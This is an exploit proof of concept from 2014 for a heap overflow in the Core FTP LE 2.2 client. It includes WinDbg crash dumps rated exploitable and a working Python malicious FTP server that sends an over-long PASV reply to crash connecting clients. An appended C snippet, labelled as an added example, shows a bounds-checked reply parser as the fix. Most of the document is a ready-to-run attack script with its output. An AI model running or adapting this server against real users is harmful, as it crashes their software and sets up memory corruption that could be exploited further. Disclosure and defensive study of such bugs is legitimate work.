Core FTP LE 2.2 - Heap Overflow (PoC)

Author: Gabor Seljan
Platform: windows
Release date: 2014-06-11

#-----------------------------------------------------------------------------#
# Exploit Title: Core FTP LE 2.2 - Heap Overflow PoC                          #
# Date: Jun 11 2014                                                           #
# Exploit Author: Gabor Seljan                                                #
# Software Link: http://www.coreftp.com/                                      #
# Version: 2.2 build 1798                                                     #
# Tested on: Windows XP SP3                                                   #
#-----------------------------------------------------------------------------#

# In some cases the client does not do proper bounds checking on server
# responses. An overly long reply from the server causes a heap overflow and
# crashes the application. The USER, PASS, PASV, SYST, PWD, CDUP commands are
# all vulnerable and possibly other commands are too.

'''
HEAP[coreftp.exe]: Heap block at 00F17BC8 modified at 00F1BBD1 past requested size of 4001
(9d8.9f4): Break instruction exception - code 80000003 (first chance)
eax=00f17bc8 ebx=00f1bbd1 ecx=7c91eab5 edx=015295ab esi=00f17bc8 edi=00004001
eip=7c90120e esp=015297ac ebp=015297b0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc              int     3
0:002> dd eax
00f17bc8  004b0804 011f0733 20373232 41414141
00f17bd8  41414141 41414141 41414141 41414141
00f17be8  41414141 41414141 41414141 41414141
00f17bf8  41414141 41414141 41414141 41414141
00f17c08  41414141 41414141 41414141 41414141
00f17c18  41414141 41414141 41414141 41414141
00f17c28  41414141 41414141 41414141 41414141
00f17c38  41414141 41414141 41414141 41414141
0:002> g
HEAP[coreftp.exe]: Invalid Address specified to RtlFreeHeap( 00C10000, 00F17BD0 )
(9d8.9f4): Break instruction exception - code 80000003 (first chance)
eax=00f17bc8 ebx=00f17bc8 ecx=7c91eab5 edx=015295ba esi=00c10000 edi=00f17bc8
eip=7c90120e esp=015297c4 ebp=015297c8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc              int     3
0:002> g
(9d8.9f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00f3bff0 ebx=00000000 ecx=41414141 edx=00f1bbf0 esi=00f3bfe8 edi=00c10000
eip=7c9276dc esp=01529704 ebp=015297d8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlOemStringToUnicodeString+0x277:
7c9276dc 8901            mov     dword ptr [ecx],eax  ds:0023:41414141=????????
0:002> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlOemStringToUnicodeString+0x0000000000000277 (Hash=0x72683756.0x417d7f55)

User mode write access violations that are not near NULL are exploitable.
(b58.cf0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00f1bbf0 ebx=41414141 ecx=00004141 edx=00c10608 esi=00f1bbe8 edi=41414141
eip=7c919064 esp=0152d30c ebp=0152d528 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
ntdll!RtlDosSearchPath_Ustr+0x473:
7c919064 8b0b            mov     ecx,dword ptr [ebx]  ds:0023:41414141=????????
0:002> dd eax
00f1bbf0  41414141 41414141 41414141 41414141
00f1bc00  41414141 41414141 41414141 41414141
00f1bc10  41414141 41414141 41414141 41414141
00f1bc20  41414141 41414141 41414141 41414141
00f1bc30  41414141 41414141 41414141 41414141
00f1bc40  41414141 41414141 41414141 41414141
00f1bc50  41414141 41414141 41414141 41414141
00f1bc60  41414141 41414141 41414141 41414141
0:002> dd esi
00f1bbe8  41414141 41414141 41414141 41414141
00f1bbf8  41414141 41414141 41414141 41414141
00f1bc08  41414141 41414141 41414141 41414141
00f1bc18  41414141 41414141 41414141 41414141
00f1bc28  41414141 41414141 41414141 41414141
00f1bc38  41414141 41414141 41414141 41414141
00f1bc48  41414141 41414141 41414141 41414141
00f1bc58  41414141 41414141 41414141 41414141
'''

#!/usr/bin/env python3

import errno
from socket import *

host = "0.0.0.0"
port = 21
payload = "A" * 150000  # over-long reply text; the client's reply buffer cannot hold it

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)

print("[+] Evil FTP Server started")
print("[+] Listening on port %d..." % port)

conn, addr = s.accept()
print("[+] Connection accepted from %s" % addr[0])
# Walk the client through a normal login so it reaches the PASV stage
conn.send(b"220 Welcome to Evil FTP Server\r\n")
conn.recv(1024)  # Receive USER
conn.send(b"331 Need password for whatever user\r\n")
conn.recv(1024)  # Receive PASS
conn.send(b"230 User logged in\r\n")
conn.recv(1024)  # Receive SYST
conn.send(b"215 UNIX Type: L8\r\n")
conn.recv(1024)  # Receive PWD
conn.send(b"257 \"/\" is current directory\r\n")

try:
  print("[+] Sending evil response for 'PASV' command...")
  conn.recv(1024)  # Receive PASV
  conn.send(("227 " + payload + "\r\n").encode())
  conn.recv(1024)  # the client crashes while handling the reply, so this recv fails
except error as e:
  # 10054 is WSAECONNRESET on Windows; errno.ECONNRESET covers POSIX hosts
  if e.errno in (10054, errno.ECONNRESET):
    print("[+] Client crashed!")
  else:
    print(e)
finally:
  conn.close()
  s.close()
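As an added example, not part of the original PoC and not Core FTP's code, here is the defensive counterpart to the bug the header comment describes: a reply reader that bounds the line it will accept before copying anything. The names FTP_REPLY_MAX, ftp_read_reply and parse_padded_reply are assumptions, and the 512-byte cap is an assumed value, since RFC 959 sets no limit on reply length.

```c
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Added example, not Core FTP's code: a bounds-checked FTP reply reader.
 * FTP_REPLY_MAX is an assumed cap; RFC 959 sets no limit, so the client
 * must choose one and reject longer replies instead of trusting the server. */
#define FTP_REPLY_MAX 512
typedef enum { FTP_OK = 0, FTP_TOO_LONG = -1, FTP_MALFORMED = -2 } ftp_status;

/* Parses one reply line ("NNN text\r\n") from wire[0..wire_len) into the
 * caller-owned buffer out[out_cap]; never writes more than out_cap bytes. */
ftp_status ftp_read_reply(const char *wire, size_t wire_len,
                          char *out, size_t out_cap, int *code)
{
    /* Search for CRLF only inside the capped window, so a 150000-byte
     * "227 AAAA..." reply is rejected before any of it is copied. */
    size_t limit = wire_len < FTP_REPLY_MAX + 2 ? wire_len : FTP_REPLY_MAX + 2;
    size_t i, text_len;
    if (out_cap == 0) return FTP_MALFORMED;
    out[0] = '\0';
    for (i = 0; i + 1 < limit; i++)
        if (wire[i] == '\r' && wire[i + 1] == '\n') break;
    if (i + 1 >= limit)   /* no terminator: incomplete, or longer than the cap */
        return limit == FTP_REPLY_MAX + 2 ? FTP_TOO_LONG : FTP_MALFORMED;
    /* RFC 959: three digits, then a space (or '-' for a multi-line reply) */
    if (i < 3 || !isdigit((unsigned char)wire[0]) || !isdigit((unsigned char)wire[1])
        || !isdigit((unsigned char)wire[2]) || (i > 3 && wire[3] != ' ' && wire[3] != '-'))
        return FTP_MALFORMED;
    *code = (wire[0] - '0') * 100 + (wire[1] - '0') * 10 + (wire[2] - '0');
    text_len = i > 3 ? i - 4 : 0;
    if (text_len >= out_cap) return FTP_TOO_LONG;   /* keep room for the NUL */
    memcpy(out, wire + 4, text_len);
    out[text_len] = '\0';
    return FTP_OK;
}

/* Builds "227 " + n bytes of 'A' + CRLF (the shape the PoC above sends) and
 * feeds it to the reader, so the reject path can be exercised offline. */
ftp_status parse_padded_reply(size_t n, char *out, size_t out_cap, int *code)
{
    size_t len = 4 + n + 2;
    char *buf = malloc(len);
    ftp_status st;
    if (!buf) return FTP_MALFORMED;
    memcpy(buf, "227 ", 4);
    memset(buf + 4, 'A', n);
    memcpy(buf + 4 + n, "\r\n", 2);
    st = ftp_read_reply(buf, len, out, out_cap, code);
    free(buf);
    return st;
}
```

The over-long reply is refused before a single byte reaches the destination buffer, which is the check the PoC shows the client lacking.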